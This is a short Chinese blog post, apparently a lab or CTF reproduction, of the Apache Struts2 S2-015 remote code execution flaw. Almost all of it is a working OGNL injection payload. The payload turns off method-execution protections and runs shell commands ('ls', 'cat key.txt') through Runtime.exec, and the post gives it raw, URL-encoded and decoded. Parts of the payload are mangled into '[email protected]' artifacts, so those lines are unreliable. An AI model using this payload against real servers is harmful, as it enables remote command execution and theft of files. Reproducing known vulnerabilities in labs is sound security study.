1. 输入/${1+1}.action,发现表达式被执行,证明存在漏洞
2.写入exp
${
#context[‘xwork.methodaccessor.denymethodexecution’]=false,
#m=#_memberaccess.getclass().getdeclaredfield(‘allowstaticmethodaccess’),
#m.setaccessible(true),
#m.set(#_memberaccess,true),
#[email protected]@tostring(@[email protected]().exec(‘ls’).getinputstream()),
#q
}.action3.执行失败,对exp进行url转码后再次写入
%24%7b%23context%5b%27xwork.methodaccessor.denymethodexecution%27%5d%3dfalse%2c
%23m%3d%23_memberaccess.getclass%28%29.getdeclaredfield%28%27allowstaticmethodaccess%27%29%2c
%23m.setaccessible%28true%29%2c
%23m.set%28%23_memberaccess%2ctrue%29%2c%23q%[email protected]@tostring%[email protected]@getruntime%28%29.exec%28%27ls%27%29.getinputstream%28%29%29%2c%23q%7d.action4.拿key
%24%7b
%23context%5b%27xwork.methodaccessor.denymethodexecution%27%5d%3dfalse%2c
%23m%3d%23_memberaccess.getclass%28%29.getdeclaredfield%28%27allowstaticmethodaccess%27%29%2c
%23m.setaccessible%28true%29%2c
%23m.set%28%23_memberaccess%2ctrue%29%2c%23q%[email protected]@tostring%[email protected]@getruntime%28%29.exec%28%27cat%20key.txt%27%29.getinputstream%28%29%29%2c%23q%7d.actionpayload
/%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27cat%20key.txt%27%29.getInputStream%28%29%29%2C%23q%7D.action解码后
/${#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#m.setAccessible(true),#m.set(#_memberAccess,true),#[email protected]@toString(@[email protected]().exec('cat key.txt').getInputStream()),#q}.action
声明:
本文采用
BY-NC-SA
协议进行授权,如无注明均为原创,转载请注明转自
运维那些事
本文地址: Apache Struts2远程代码执行漏洞(S2-015)复现
本文地址: Apache Struts2远程代码执行漏洞(S2-015)复现
